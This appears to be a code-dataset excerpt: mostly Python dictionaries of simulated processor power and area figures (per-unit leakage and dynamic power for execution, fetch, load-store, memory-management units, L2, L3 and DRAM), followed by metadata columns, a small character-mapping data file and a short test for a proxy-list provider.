'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.380738,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.805977,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.72041,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000651223,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000651223,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000569303,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000221529,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00137434,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00324609,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00616923,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0919721,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.85021,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.20347,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.312379,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.35265,
'Instruction Fetch Unit/Runtime Dynamic': 0.617236,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0466842,
'L2/Runtime Dynamic': 0.00644507,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.40524,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.04453,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0701438,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0701439,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.73647,
'Load Store Unit/Runtime Dynamic': 1.4606,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.172963,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.345926,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.061385,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0620814,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.363745,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0333701,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.625302,
'Memory Management Unit/Runtime Dynamic': 0.0954515,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.3051,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.495668,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.019947,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.146459,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.662073,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.56222,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.209512,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.367249,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.15216,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.343277,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.553693,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.279486,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.17646,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.215969,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.26383,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.217667,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0143986,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.181715,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.106486,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.399382,
'Execution Unit/Register Files/Runtime Dynamic': 0.120885,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.435213,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.912457,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.98242,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000684763,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000684763,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000596675,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000231118,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00152968,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00349589,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00655661,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.102368,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.219719,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.347688,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96396,
'Instruction Fetch Unit/Runtime Dynamic': 0.679827,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0500278,
'L2/Runtime Dynamic': 0.00792427,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.56757,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.12261,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0753955,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0753955,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.9236,
'Load Store Unit/Runtime Dynamic': 1.56983,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.185912,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.371825,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0659809,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0667291,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0360286,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.669447,
'Memory Management Unit/Runtime Dynamic': 0.102758,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 23.4603,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.572582,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0224559,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.162322,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.757359,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 6.10012,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 2.67763722357763,
'Runtime Dynamic': 2.67763722357763,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.266145,
'Runtime Dynamic': 0.139506,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 97.385,
'Peak Power': 130.497,
'Runtime Dynamic': 28.603,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 97.1189,
'Total Cores/Runtime Dynamic': 28.4634,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.266145,
'Total L3s/Runtime Dynamic': 0.139506,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.032823
| 124
| 0.681948
| 8,082
| 68,580
| 5.780747
| 0.067558
| 0.12363
| 0.113014
| 0.093493
| 0.939983
| 0.931956
| 0.919307
| 0.888891
| 0.865625
| 0.847132
| 0
| 0.131475
| 0.224424
| 68,580
| 914
| 125
| 75.032823
| 0.746903
| 0
| 0
| 0.646608
| 0
| 0
| 0.657689
| 0.048118
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
727808df0af2db769c678df00978f6da5d175b8a
| 263
|
py
|
Python
|
python/anyascii/_data/_112.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_112.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_112.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
b=' 0 1 2 3 4 5 6 7 8 9'
| 263
| 263
| 0.041825
| 11
| 263
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.714286
| 0.946768
| 263
| 1
| 263
| 263
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0.981061
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
72d61f47023a20d7e72765708310910c82f4471c
| 174
|
py
|
Python
|
tests/providers/kuaidaili_provider_test.py
|
gillbates/scylla
|
88b999eb60504c23041a56b343c6a021d778538d
|
[
"Apache-2.0"
] | null | null | null |
tests/providers/kuaidaili_provider_test.py
|
gillbates/scylla
|
88b999eb60504c23041a56b343c6a021d778538d
|
[
"Apache-2.0"
] | null | null | null |
tests/providers/kuaidaili_provider_test.py
|
gillbates/scylla
|
88b999eb60504c23041a56b343c6a021d778538d
|
[
"Apache-2.0"
] | null | null | null |
from scylla.providers import KuaidailiProvider
from tests.providers.helpers import assert_provider
def test_cool_proxy_provider():
assert_provider(KuaidailiProvider())
| 24.857143
| 51
| 0.844828
| 20
